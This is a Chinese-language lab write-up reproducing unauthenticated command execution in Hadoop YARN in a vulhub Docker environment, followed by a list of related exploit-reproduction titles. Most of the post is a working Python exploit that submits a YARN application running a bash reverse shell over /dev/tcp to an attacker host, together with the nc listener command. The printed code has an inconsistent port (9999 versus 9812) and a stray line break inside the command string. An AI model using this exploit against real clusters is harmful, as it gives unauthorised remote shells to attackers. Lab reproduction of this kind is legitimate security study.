2. 程式人生 > 其它 >漏洞復現-hadoop-命令執行

漏洞復現-hadoop-命令執行

阿新 發佈:2021-06-28

0x00 實驗環境

攻擊機:Win 10

靶機也可作為攻擊機:Ubuntu18 (docker搭建的vulhub靶場)

0x01 影響版本

hadoop 3.3.0以下

vulhub版本為2.8.1:

0x02 漏洞復現

(1)訪問/cluster/apps頁面:(該頁面存在說明存在未授權訪問漏洞)

(2)使用以下官方exp反彈shell

#!/usr/bin/env python

import requests

target = 'http://127.0.0.1:8088/'
lhost = '192.168.0.1' # put your local host ip here, and listen at port 9999
 


url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1
 
' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

執行該exp:

python3 unauthorized-yarn-hadoop.py http://xxx:8088 #執行Exp

(3)攻擊機開啟監聽(執行exp之前開啟監聽):

nc -lvvp 9812

(4)會話獲取成功:

相關推薦

漏洞復現-hadoop-命令執行

0x00 實驗環境 攻擊機:Win 10 靶機也可作為攻擊機:Ubuntu18 (docker搭建的vulhub靶場)

Redis遠端命令執行漏洞復現

本文首發於我的個人部落格,記錄了我在實驗室學習滲透測試所做的第二個漏洞復現,全部過程記錄在此,以便後續檢視,同時也希望本文能對您有所幫助。

fastjson遠端命令執行漏洞復現

fastjson遠端命令執行漏洞復現 使用vulhub提供的docker環境:https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce

漏洞復現系列】ThinkPHP 5 遠端命令執行

使用vulhub搭建環境: https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce 啟動docker容器:

Weblogic未授權遠端命令執行漏洞(CVE-2020-14882&CVE-2020-14883)復現

Weblogic是Oracle公司推出的J2EE應用伺服器,CVE-2020-14882允許未授權的使用者繞過管理控制檯的許可權驗證訪問後臺,CVE-2020-14883允許後臺任意使用者通過HTTP協議執行任意命令。使用這兩個漏洞組成的利用鏈,可通

weblogic 未授權命令執行漏洞(CVE-2020-14882,CVE-2020-14883)復現

漏洞描述 2020年10月29日,360CERT監測發現 Weblogic ConSole HTTP 協議程式碼執行漏洞,該漏洞編號為 CVE-2020-14882,CVE-2020-14883 ,漏洞等級:嚴重,漏洞評分:9.8。遠端攻擊者可以構造特殊的HTTP請求,在未經身

Weblogic遠端命令執行漏洞復現(CVE-2020-14645)

影響版本 Oracle WebLogic Server 10.3.6.0.0 Oracle WebLogic Server 12.1.3.0.0 Oracle WebLogic Server 12.2.1.3.0

浙江宇視科技安防(DVR/NVR)等監控裝置命令執行漏洞復現

宣告 本文內容僅供學習交流使用,請勿利用文章內的相關技術從事非法測試,如因此產生的一切不良後果與文章作者無關。

Weblogic命令執行漏洞(CVE-2018-2628)復現

一、漏洞環境搭建 CVE-2018-2628影響的軟體版本為: Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2

CVE-2018-1273 Spring Data Commons 遠端命令執行漏洞復現

一、漏洞描述 Spring Data是一個用於簡化資料庫訪問,並支援雲服務的開源框架,Spring Data Commons是Spring Data下所有子專案共享的基礎框架。Spring Data Commons 在2.0.5及以前版本中,存在一處SpEL表示式注入漏洞

Apache Solr 遠端命令執行漏洞復現(CVE-2019-0193)

一.漏洞介紹 Apache Solr 是一個開源的搜尋伺服器。Solr 使用 Java 語言開發,主要基於 HTTP 和 Apache Lucene 實現。此次漏洞出現在Apache Solr的DataImportHandler,該模組是一個可選但常用的模組,用於從資料庫

Samba遠端命令執行漏洞復現

Linux版永恆之藍 0x00 漏洞概述 編號CVE-2017-7494。 Samba允許連線一個遠端的命名管道,在連線前會呼叫is_known_pipename()函式驗證管道名稱是否合法。

Apache CouchDB命令執行漏洞復現

連鎖反應 0x00 漏洞概述 編號為CVE-2017-12636。 Apache CouchDB是一款開源資料庫,專注於易用性和成為“完全擁抱Web的資料庫”。它使用JSON作為儲存格式,JavaScript作為查詢語言,MapReduce和HTTP作為API的NoS

漏洞復現-imagemagick:6.9.2-命令執行

0x00 實驗環境 攻擊機:Win 10 靶場:docker拉的vulhub靶場 0x01 影響版本 對版本低於6.9.3.9的ImageMagick有影響

漏洞復現-thinkphp5.0.23-遠端命令執行

0x00 實驗環境 攻擊機:Win 10 靶場:docker拉的vulhub靶場 0x01 影響版本 其 5.0.23 以前的版本中,獲取method的方法中沒有正確處理方法名,導致攻擊者可以呼叫 Request 類任意方法並構造利用鏈,從而導致遠端程式

Webmin 命令執行漏洞 (CVE-2020-35606)--- 復現

漏洞繞過針對 採取的措施 CVE-2019-12840 並將其轉換為新向量。 供應商尚未修復此漏洞

Webmin 命令執行漏洞 (CVE-2020-35606)---復現

CVE-Mitre 連結 下載 webmin_pu_escape_bypass_rce.rb (Metasploit) 漏洞簡介: 該模組利用 Webmin 1.962 及更低版本中的任意命令執行漏洞。 任何授權“包更新”模組的使用者都可以使用 root 許可權執行任意命令

Struts2 S2-061 遠端命令執行漏洞(CVE-2020-17530)復現

Struts2 S2-061 遠端命令執行漏洞(CVE-2020-17530)復現 0x00 漏洞介紹 Struts2框架是一個用於開發Java EE網路應用程式的開放原始碼網頁應用程式架構。它利用並延伸了Java Servlet API,鼓勵開發者採用MVC架構。Stru

PHPMailer 命令執行漏洞(CVE-2016-10033)復現

前言 PHPMailer沒有聽過,比較好奇,最近正好在學習PHP程式碼審計,所以來複現這個CVE,學習點新東西。

CVE-2020-10977-GITLAB CE/EE 任意檔案讀取導致遠端命令執行漏洞-環境搭建及完整復現圖文詳細筆記

漏洞環境搭建-CENTOS7 1.安裝依賴軟體 yum -y install policycoreutils openssh-server openssh-clients postfix